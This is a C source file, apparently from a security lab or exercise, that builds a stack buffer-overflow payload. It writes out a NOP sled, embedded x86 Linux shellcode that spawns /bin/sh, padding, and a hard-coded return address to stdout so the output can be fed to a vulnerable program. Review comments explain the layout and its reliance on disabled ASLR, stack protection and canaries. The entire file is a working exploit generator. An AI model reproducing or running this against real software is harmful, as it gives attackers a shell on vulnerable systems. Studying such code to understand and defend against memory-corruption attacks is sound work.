#include <unistd.h> // for write
#include <stdint.h> // for uint32_t
#include <string.h> // for strlen
#include <stdlib.h> // for free, calloc
#include <stdio.h> // fprintf
/*
 * Constants used to size the generated input.
 *
 * BUFFER_SIZE: presumably the size of the buffer in the program this input
 * is fed to; that program is not part of this file (TODO confirm).
 * HELLO_MSG: only its length is used below; presumably a prefix the target
 * places in the same buffer ahead of the input (TODO confirm).
 */
#define BUFFER_SIZE 1024
#define HELLO_MSG "nice to meet you "

/*
 * Opaque machine-code bytes followed by the path string "/bin/sh".
 * The literal is split so the code bytes and the trailing string are
 * visibly separate; the resulting array is 48 payload bytes plus the
 * terminating NUL.
 * NOTE(review): the \xcd\x80 pairs suggest 32-bit x86 Linux code using
 * int 0x80 - confirm by disassembly. A fixed byte run like this, together
 * with the embedded "/bin/sh", is the kind of constant a content signature
 * can match on.
 */
const char shellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff"
    "/bin/sh";

/*
 * Hard-coded 32-bit address that main() adjusts and appends to the output.
 * NOTE(review): a fixed address only stays valid when the target's memory
 * layout is identical on every run; address-space randomisation invalidates
 * it.
 */
uint32_t ret = UINT32_C(0xbf85b4e0);
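/*
 * Write the generated input to stdout and print the computed sizes to stderr.
 *
 * Output layout, in order:
 *   1. 40 filler bytes (0x90, x86 NOP)
 *   2. the shellcode bytes, without the literal's trailing NUL
 *   3. the remaining filler bytes (bourrage - 40)
 *   4. the 4 bytes of `ret`, in host byte order
 *   5. a newline
 *
 * The constants 12, 20 and 40 are fixed offsets whose derivation is not
 * visible in this file; presumably they were tuned against one specific
 * build of the target (TODO confirm). Because the address is fixed, the
 * output is only meaningful against a target whose layout never changes:
 * ASLR, a non-executable stack and stack canaries each invalidate it.
 *
 * Returns 0 on success, EXIT_FAILURE if the filler cannot be allocated or
 * the computed filler length is shorter than the leading run.
 *
 * NOTE(review): the return values of write() are still not checked, so a
 * short or failed write goes unnoticed.
 */
int main(void) {
    enum { LEAD_FILL = 40 }; /* filler bytes emitted before the shellcode */

    const size_t hello_size = strlen(HELLO_MSG);
    const size_t code_size = sizeof(shellcode) - 1; /* drop the trailing NUL */

    /* size_t must be printed with %zu; %d is a format/argument mismatch. */
    fprintf(stderr, "hello_size = %zu\n", hello_size);
    fprintf(stderr, "code_size = %zu\n", code_size);

    /* "bourrage" is French for padding. */
    const size_t bourrage = BUFFER_SIZE - hello_size - code_size + 12;
    ret += hello_size + 20;

    fprintf(stderr, "bourrage = %zu\n", bourrage);
    /* %#x expects unsigned int; cast so the specifier matches on every ABI. */
    fprintf(stderr, "ret = %#x\n", (unsigned int)ret);

    /*
     * The two filler writes below read LEAD_FILL and bourrage - LEAD_FILL
     * bytes from the buffer; a shorter buffer would be over-read and the
     * subtraction would wrap.
     */
    if (bourrage < LEAD_FILL) {
        fprintf(stderr, "bourrage too small\n");
        return EXIT_FAILURE;
    }

    char *buffer = malloc(bourrage);
    if (buffer == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    memset(buffer, 0x90, bourrage); /* NOP */

    write(1, buffer, LEAD_FILL);
    write(1, shellcode, code_size);
    write(1, buffer, bourrage - LEAD_FILL);

    write(1, &ret, sizeof(ret));
    write(1, "\n", 1);

    free(buffer);

    return 0;
}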